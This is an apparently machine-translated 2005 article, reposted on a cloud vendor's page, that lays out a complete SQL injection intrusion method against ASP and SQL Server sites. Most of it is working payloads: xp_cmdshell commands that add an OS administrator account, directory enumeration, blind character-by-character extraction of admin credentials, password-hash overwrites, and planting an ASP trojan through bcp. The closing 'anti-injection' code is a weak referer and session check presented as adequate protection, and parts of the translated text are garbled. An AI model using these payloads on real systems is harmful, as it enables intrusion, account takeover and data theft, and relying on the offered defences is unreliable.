SQL injection incomplete thinking and anti-injection program

Source: Internet
Author: User
Tags filter bulk insert character set iis odbc connection sql injection sql injection attack table name
Program | anti-injection SQL injection incomplete thinking and anti-injection program
[ Traditional Chinese] | Article Category: Database Security| Article rank: | Release date: 2005-2-13 Sunday

[ counter| Wonderful blog| Magic Expression| Blog Application| Source Download| IP Query| Html2js]
Turn from: Dynamic Network production guide www.knowsky.com

< a >sql injection profile

Many web site programs in the writing, the user does not have to judge the legality of input data, so that the application has security problems. Users can submit a database query code, (usually in the browser address bar, through the normal WWW port access) According to the results of the program returned to obtain some of the data he wanted to know, this is called SQL injection, that is, SQL injection.

< two >sql injection ideas

Thinking is the most important. In fact, many people do not know what the SQL can do? Here's a summary of the overall idea of SQL injection intrusion:

1. SQL injection vulnerability judgment, that is, to find the injection point

2. Determine the background database type

3. Determine xp_cmdshell performance; If the current connection data's account has SA permission, and the Master.dbo.xp_cmdshell extended stored procedure (a shell that calls this stored procedure to use the operating system directly) can execute correctly, The entire computer can be fully controlled in several ways, completing the entire injection process, or continuing:

1. Discovery Web Virtual Directory

2. Upload ASP Trojan Horse;

3. Get Administrator Privileges

Specific steps:

The judgment of SQL injection Vulnerability

If you have not previously played injection, please remove IE menu-tool-internet Option-advanced-Display friendly HTTP error messages in front of the check.

In order to clarify the problem, the following is HTTP://www.163.com/news.asp?id=xx(this address is hypothetical), for example, XX may be an integral type, or possibly a string.

1, the judgment of the parameter of the whole type

When the input parameter xx is an integral type, the SQL statement typically looks like this in news.asp:

SELECT * from table name where field =xx, so you can test the existence of SQL injection with the following steps.

The simplest way to judge

HTTP://www.163.com/news.asp?id=xx ' (Append a single quote),

At this point the SQL statement in news.asp becomes a

SELECT * from table name where Field =xx ',

If the program does not filter "'", it prompts news.asp to run an exception, but such a method is very simple, but not the best, because:

One, not necessarily every server's IIS return specific error prompts to the client, if the program with CInt (parameters) such as words, SQL injection will not be successful, but the server will also complain, the specific message to deal with the URL when the server error. Please contact your system administrator.

Second, most programmers have been "'" filtered out, so the "'" Test does not have the injection point, so the general use of classic 1=1 and 1=2 test methods, see below:

HTTP://www.163.com/news.asp?id=xx and 1=1, news.asp run normally,

And the result is the same as that of the HTTP://www.163.com/news.asp?id=xx operation;

HTTP://www.163.com/news.asp?id=xx and 1=2, news.asp run abnormally; (this is the classic 1=1 1=2 judgment method)

If it is satisfied with the above, there will be a SQL injection vulnerability in news.asp, which may not be injected.

2, the judgement of the string type parameter

The method is basically the same as that of the numerical parameter estimation method

When the input parameter xx is a string, the SQL statement typically looks like this in news.asp:

SELECT * from table name where field = ' xx ', you can use the following procedure to test whether the SQL injection exists.

HTTP://www.163.com/news.asp?id=xx ' (Append a single quote), at which point the SQL statement in news.asp becomes a
SELECT * from table name where Field =xx ', news.asp run exception;
HTTP://www.163.com/news.asp?id=xx and ' 1 ' = ' 1 ', news.asp running normally,

And the result is the same as that of the HTTP://www.163.com/news.asp?id=xx operation;

HTTP://www.163.com/news.asp?id=xx and ' 1 ' = ' 2 ', news.asp run abnormally;

If the above is satisfied, then there is a SQL injection vulnerability in the news.asp, and the reverse is not injected

3, special circumstances of the treatment

Sometimes ASP programmers filter out single quotes and other characters in the programmer to prevent SQL injection. You can try this at this point in several ways.

① size Blending method: Because VBS is not case-sensitive, programmers often filter all uppercase strings or filter lowercase strings all at once, while case-by-case blending is often overlooked. such as using a select instead of Select,select;

②unicode: In IIS, internationalization is done in the Unicode character set, and we can enter the string into a Unicode string that is entered in IE. such as + =%2b, space =%20 and so on; UrlEncode information see annex I;

③ascii Code method: You can put the input of some or all of the characters all

<4> In addition to the above methods, there is a simpler way to use off-the-shelf tools like the NB Alliance Nbsi is a very good tool, the latest version of the current 2.2

Ii. Judging the type of database

There are differences in the functions and injection methods of different databases, so we have to judge the type of database before we inject it. The most commonly used database for ASP is access and SQL Server, with over 99% Web sites on the web being one of them.

How do you let the program tell you what database it uses? To see:

SQL Server has some system variables that can be retrieved directly from the error message if the servers IIS prompts are not turned off and SQL Server returns an error:
HTTP://www.163.com/news.asp?id=xx;and user>0

This statement is simple, but it contains the essence of SQL Server-specific injection methods, and I myself found this highly efficient method of guessing in an unintentional test. Let me see what it means: first, the preceding statement is normal, with emphasis on and user>0, and we know that user is a built-in variable of SQL Server whose value is the current connected username and the type is nvarchar. With a nvarchar value of 0 compared to the number of int, the system will first attempt to convert the value of nvarchar to an int, of course, the process will certainly be wrong, SQL Server error prompt is: The nvarchar value "ABC" Conversion data type int A syntax error occurred in the column, hehe, ABC is the value of the variable user, so, do not waste Chuihuizhili get the database username. In a future space, you will see a lot of statements in this way. Incidentally, as we all know, SQL Server's user SA is a role equivalent to adminstrators permissions, and with SA privileges, it is almost certain that the host's administrator can be obtained. The above method can easily test whether to log on with an SA, and note that if the SA is logged in, the hint is that the column that converts "dbo" to int has an error instead of "sa".

If server IIS does not allow you to return error prompts, how do you determine the database type? We can start with access and SQL Server and the differences, access and SQL Server have their own system tables, such as tables that hold all the objects in the database, access is in the system table [msysobjects], but reading the table in the Web environment prompts the No permissions ", SQL Server is in table [sysobjects] and is readable in the web environment.

With the confirmation that you can inject it, use the following statement:

HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT (*) from sysobjects) >0
HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT (*) from msysobjects) >0

If the database is SQL Server, then the first URL page is roughly the same as the original page HTTP://www.163.com/news.asp?id=xx , and the second URL, because the table msysobjects cannot be found, prompts for an error, Even if the program has fault-tolerant processing, the page is completely different from the original page.

If the database is using access, then the situation is different, the first URL of the page and the original page is completely distinct; the second URL, depending on whether the database settings are allowed to read the system table, is generally not allowed, so and the original URL is completely different. In most cases, you can use the first URL to know the type of database used by the system, and the second URL will only be validated when the IIS error prompts are turned on.

Iii. Determination of xp_cmdshell implementation

If the account with the current connection data has SA permission and the Master.dbo.xp_cmdshell extended stored procedure (the shell that calls this stored procedure to use the operating system directly) can execute correctly, the entire computer can be fully controlled in the following ways, and all subsequent steps can be saved

1,HTTP://www.163.com/news.asp?id=xx and user>;0 News.asp executes an exception but can get the user name of the currently connected database (if the dbo is displayed, the SA is represented).

2,HTTP://www.163.com/news.asp?id=xx and db_name () >0 news.asp the name of the database that executes the exception but can get the current connection.

3.HTTP://www.163.com/news.asp?id=xxexec master. xp_cmdshell "NET user aaa Bbb/add"--(master is Sql-server's main data
The semicolon in the name of the library indicates that Sql-server executes the statement before the semicolon, and continues to execute the statement following it; the "-" is the annotation, which means that all the content behind it is just a comment and the system does not execute) can directly increase the operating system account AAA, the password is BBB.

4.HTTP://www.163.com/news.asp?id=xxexec master. xp_cmdshell "net localgroup Administrators Aaa/add"--add just
Account AAA is added to the Administrators group.

5,HTTP://www.163.com/news.asp?id=xxbackuup database name to disk= ' C:\inetpub\wwwroot\save.db ' will get the data content
All backup to the Web directory, and then use HTTP to download this file (of course, the preferred to know the Web virtual directory).

6. Create a Unicode vulnerability by copying CMD

HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell "Copy C:\winnt\system32\cmd.exe

C:\inetpub\scripts\cmd.exe "Creates a Unicode vulnerability that, through the use of this vulnerability, completes the control of the entire computer (the preferred knowledge of the Web virtual directory, of course).

So you can successfully complete a SQL injection attack, do not be excited, in practice you will find that this is more difficult than the theory will have more difficulties waiting for you come over, the following go on if the above conditions do not set up the need to continue to struggle (to hang a horse:))

Go on~!

The following steps should be continued when the above conditions are not true

(i), Discovery Web virtual directory

Only find the Web virtual directory to determine the location of the ASP Trojan, and then get user permissions. There are two methods that are more effective.

One is based on empirical guessing, in general, the Web virtual directory is: C:\inetpub\wwwroot;

D:\inetpub\wwwroot; E:\inetpub\wwwroot, and the executable virtual directory is:
c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts and so on.

The second is to traverse the directory structure of the system, analyze the results and find the Web virtual directory;

Create a temporary table first: Temp

HTTP://www.163.com/news.asp?id=xx;create Table temp (id nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255) , num3
nvarchar (255));--

Next:

1 We can use Xp_availablemedia to get all the current drives and save them in the temp table:

HTTP://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--

We can get a list of drives and related information by querying the contents of temp

2 We can use Xp_subdirs to get the subdirectory list and save it in the temp table:

HTTP://www.163.com/news.asp?id=xx;insert into temp (ID) Exec master.dbo.xp_subdirs ' c:\ ';--

3 We can also use Xp_dirtree to obtain the directory tree structure of all subdirectories, and inch into the temp table:

HTTP://www.163.com/news.asp?id=xx;insert into temp (ID,NUM1) exec master.dbo.xp_dirtree ' c:\ ';--

This allows you to successfully browse to all directories (folders) List:

If we need to view the contents of a file, we can do this by executing Xp_cmdsell:

HTTP://www.163.com/news.asp?id=xx;insert into temp (ID) Exec master.dbo.xp_cmdshell ' type c:\web\index.asp '; --

Use the ' BULK INSERT ' syntax to insert a text file into a temporary table. such as: BULK INSERT temp (ID) from ' c:\inetpub\wwwroot\index.asp '
Browse temp to see the contents of the Index.asp file! Through the analysis of various ASP files, can get a lot of system information, Web construction and management information, and even can get the SA account connection password.

Of course, if Xp_cmshell can execute, we can use it to complete:

HTTP://www.163.com/news.asp?id=xx;insert into temp (ID) exec master.dbo.xp_cmdshell ' dir c:\ ';--
HTTP://www.163.com/news.asp?id=xx;insert into temp (ID) exec master.dbo.xp_cmdshell ' dir c:\ *.asp/s/a ';--

Through xp_cmdshell we can see all that we want to see, including W3SVC

HTTP://www.163.com/news.asp?id=xx;insert into temp (ID) exec Master.dbo.xp_cmdshell ' cscript
C:\Inetpub\AdminScripts\adsutil.vbs enum W3SVC '

However, if it is not SA permission, we can also use the

HTTP://www.163.com/news.asp?id=xx;insert into temp (ID,NUM1) exec master.dbo.xp_dirtree ' c:\ ';--

Attention:

1, after each completed a browse, you should delete all the contents of temp, delete method is:

HTTP://www.163.com/news.asp?id=xx;delete from temp;--

2. Browse the Temp table by: (assuming TestDB is the database name of the current connection)
HTTP://www.163.com/news.asp?id=xx and (select top 1 IDs from TestDB.dbo.temp) >0

Get the value of the first record ID field in table temp and compare it to an integer, obviously news.asp the work exception, but in the exception you can find the value of the ID field. Assuming that the discovered table name is XYZ, the

HTTP://www.163.com/news.asp?id=xx and (select top 1 ID from TestDB.dbo.temp) >0 where ID not in (' XYZ ') >0

Gets the value of the second Record ID field in table temp.

(two), upload ASP Trojan

The so-called ASP Trojan, is a special function of the ASP code, and put into the Web virtual directory under the scripts, remote customers through IE can execute it, and then get the system user permissions, to achieve the initial control of the system. Upload ASP Trojans generally have two more effective methods:

1, the use of web remote management functions

Many web sites, for the convenience of maintenance, provide remote management functions, there are many Web sites, the content of different users have different access rights. In order to achieve the control of user rights, there is a Web page, requires user name and password, only input the correct value, in order to carry out the next operation, you can achieve the management of the web, such as uploading, downloading files, directory browsing, modify configuration and so on.

Therefore, if you get the correct username and password, not only upload ASP Trojan, and sometimes even directly to the user permission to browse the system, the previous step of the "Discovery of Web virtual directory" complex operations can be omitted.

The user name and password are generally stored in a table, found this table and read the contents of the problem solved. Here are two effective ways to do this.

A, injection method:

In theory, the Certification Web page will have a type such as:

SELECT * from admin where username= ' XXX ' and password= ' YYY ' statement, it is easy to implement SQL injection if the necessary character filtering is not done before the sentence is officially run.

If you type in the User name text box: ABC ' or 1=1--in the Password box: 123 The SQL statement becomes:

SELECT * from admin where username= ' abc ' or 1=1 and password= ' 123 '

Regardless of user input any user name and password, this statement can always correctly execute, the user easily cheated system, obtain legal identity.

B, guess the solution:

The basic idea is: guess all the database name, guess every table in the library name, analysis may be stored user name and password table name, guess the table of each field name, guess the table of each record content.

A guess all the database names

HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6 ) <>0

Because the value of dbid from 1 to 5, the system is used. So the user built it must be starting from 6. And we submitted the Name>1 (Name field is a character of the field and the number comparison will be error), news.asp work exception, you can get the first database name, the same dbid to 7,8,9,10,11,12 respectively ... You can get all the database names.

The following hypothetical database name is TestDB.

b Guess the name of the user name table in the database

Guess the solution: This method is based on personal experience guessing table name, generally speaking,

User,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
Systemusers,sysuser,sysusers,sysaccounts,systemaccounts and so on. And judging by the statement

  HTTP://www.163.com/news.asp?id=xx and (SELECT COUNT (*) from testdb.dbo. Table name) >0 If the table name exists, the news.asp works correctly, otherwise it is abnormal. This loops until you guess the name of the System Account table.

Reading method: Sql-server has a table sysobjects that holds the core information of the system, all the tables and views of a library are stored in this table, and this table can be accessed through the web.

When Xtype= ' U ' and status>0 represent the tables created by the user, the name of the user name table can be found and analyzed with each user's table and name, and the basic implementation method is:

①http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype= ' U ' and status>0) > 0
The first user establishes the name of the table and compares it to an integer, apparently news.asp the work exception, but the name of the table can be found in the exception. Assuming that the discovered table name is XYZ, the

②http://www.163.com/news.asp?id=xx and (select top 1 name from TestDB.dbo.sysobjects where xtype= ' U ' and status>0 and
Name not in (' xyz ') >0 can get the name of the table created by the second user, and in the same vein, get all the names of the tables created.

Depending on the name of the table, you can generally assume that the user name and password of the table, the following assumes that this table is named Admin.

C Guess the user name and password field name

Admin table must have a user name section, there must be a password field, only the name of the two fields, you can get the contents of the two fields. How to get their names, there are also the following two ways.

Guessing solution: This method is based on personal experience guessing field names, in general, the name of the user name section commonly used: Username,name,user,account. The name of the password field is commonly used: PASSWORD,PASS,PWD,PASSWD and so on. And judging by the statement

HTTP://www.163.com/news.asp?id=xx and (select count (field name) from TestDB.dbo.admin) >0 "SELECT count (field name) from Table Name "

The statement gets the number of rows in the table, so if the field name exists, the news.asp works correctly, otherwise the exception. This loops until you guess the names of two fields.

Reading method: The basic realization method is

HTTP://www.163.com/news.asp?id=xx and (select top 1 col_name (object_id (' admin '), 1) from TestDB.dbo.sysobjects) >0.
Select top 1 col_name (object_id (' admin '), 1) from TestDB.dbo.sysobjects is the first field name that obtains a known table name from sysobjects, and when compared to an integer, it is obvious that the news.asp work exception, but the name of the field can be found in the exception. Replace the 1 in col_name (' admin ', 1) with 2,3,4,5,6 ... You can get all the field names.

D guess the user name and password

The most common and effective way to guess the content of user names and passwords is:

ASCII verbatim decoding method: Although this method is slow, but certainly feasible. The basic idea is to guess the length of the field first, and then guess the value of each bit in turn. Guess the username is the same as the method of guessing the password, the following is an example of the user name to illustrate its process.

HTTP://www.163.com/news.asp?id=xx and (select top 1 len (username) from TestDB.dbo.admin) =x (x=1,2,3,4,5, ... n, Username

is the name of the user name field, admin is the name of the table, if x is a value I and news.asp is running normally, I is the length of the first username. For example, when entering
HTTP://www.163.com/news.asp?id=xx and (select top 1 len (username) from TestDB.dbo.admin) = 8 o'clock News.asp is working properly, the first username is 8 length

   HTTP://www.163.com/news.asp?id=xxand (select top 1 ASCII (substring (username,m,1)) from TestDB.dbo.admin) =n (the value of M is between 1 and the length of user name obtained in the previous step, when m=1,2,3, ... Guess the,... of the first 1,2,3, respectively. The value of n is the ASCII value of 1~9, A~z, A~z, that is, any value between 1~128, admin is the name of the System user account table, if n is a value I and the news.asp is working normally, then I corresponds to a value of the username. For example, when entering
HTTP://www.163.com/news.asp?id=xxand (select top 1 ASCII (substring (username,3,1)) from TestDB.dbo.admin) = 80 o'clock news.asp is functioning correctly, the third digit of the user name is P (ASCII for P is 80);HTTP://www.163.com/news.asp?id=xxand (select top 1 ASCII (substring (username,9,1)) from TestDB.dbo.admin) = 33 o'clock news.asp is functioning correctly, the 9th digit of the username is! (! 's ASCII is 80); After guessing the first username and password, you can guess all the other user names and passwords by the same token. Note: Sometimes the resulting password may be encrypted by MD5 and other means, but also need to use special tools for the removal of the secret. or change the password first, after use and then change back, see the following description. Simple method: Guess user name withHTTP://www.163.com/news.asp?id=xxand (select top 1 flag from TestDB.dbo.admin where username>1), flag is a field in the admin table, username is a user name segment, At this point news.asp the work exception, but can get the username value. With the same method, you can get a second user name, a third user, and so on, until all the user names in the table.

Guess user password:HTTP://www.163.com/news.asp?id=xx and (select top 1 flag from TestDB.dbo.admin where pwd>1), flag is ADMI n a field in a table, PWD is a password field, at which point news.asp work exception, but can get PWD value. With the same method, you can get a second username password, a third user's password, and so on, until all the user's password is in the table. The password is sometimes encrypted by MD5 and can be changed.

  HTTP://www.163.com/news.asp?id=xx;update TestDB.dbo.admin set pwd= ' a0b923820dcc509a ' where username= ' www ';--(The MD5 value of 1 is: Aaabbbcccdddeeef, that is, change the password to 1;www to a known username) In the same way, of course, the password can be changed to the original value.

2. Use table content to guide file function

SQL has a bcp command that can guide the contents of a table into a text file and place it in a specified location. Using this feature, we can first build a temporary table, and then a row in the table to enter an ASP trojan, and then use the BCP command to export the formation of ASP files.

The command line format is as follows:

BCP select * from Text ... Foo "queryout c:\inetpub\wwwroot\163.asp–c–s localhost–u sa–p foobar
(' S ' parameter for the server executing the query, ' U ' parameter for username, ' P ' parameter for password, finally uploaded a 163.asp trojan)

3, the use of tools, such as NBSI give some reference data the most important table name:

SELECT * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
Systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

Some of the most important user names (existing in the default SQL database)

Public
Dbo
Guest (generally prohibited, or not authorized)
Db_sercurityadmin
Ab_dlladmin
Some default extensions
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia Drive Related
Xp_dirtree Directory
XP_ENUMDSN ODBC connection
Xp_loginconfig Server security Mode information
Xp_makecab Create a compressed volume
Xp_ntsec_enumdomains Domain Information
Xp_terminate_process The terminal process, give a PID

(iii), access to the system administrator

ASP Trojan only user rights, to obtain full control of the system, but also have the system administrator rights. What to do? There are a number of ways to elevate permissions:

Upload Trojan, modify the boot automatically run the. ini file (it a reboot, it will die);

Copying CMD.exe to scripts, artificially creating a Unicode vulnerability;

Download Sam file, crack and get all username password of OS;

And so on, depending on the specific circumstances of the system, you can take different approaches.

So how do we prevent injection? The program can be added to ASP or HTML or PHP or CGI as follows. After testing. Join the beginning of a file like top.asp

Method One:

<%if session ("username" = "") or Session ("UserKey" = "" Then
Response.Redirect ". /.. /"
End If%>

(Note: Whenever there is user injection, jump to ... /.. /directory, hehe, see how you inject me)

Method Two:

<%
Server_v1=cstr (Request.ServerVariables ("Http_referer")
Server_v2=cstr (Request.ServerVariables ("SERVER_NAME")
If Mid (Server_v1,8,len (SERVER_V2)) <>server_v2 Then
Response.Write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=# Eeeeee width=450> "
Response.Write "<tr><td style=" font:9pt Verdana ">"
Response.Write "You submitted the wrong path, prohibit the submission of data from outside the site please do not mess with this parameter!" "
Response.Write "</td></tr></table></center>"
Response.End
End If
%>

(Note: As long as there is user injection is judged as external

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.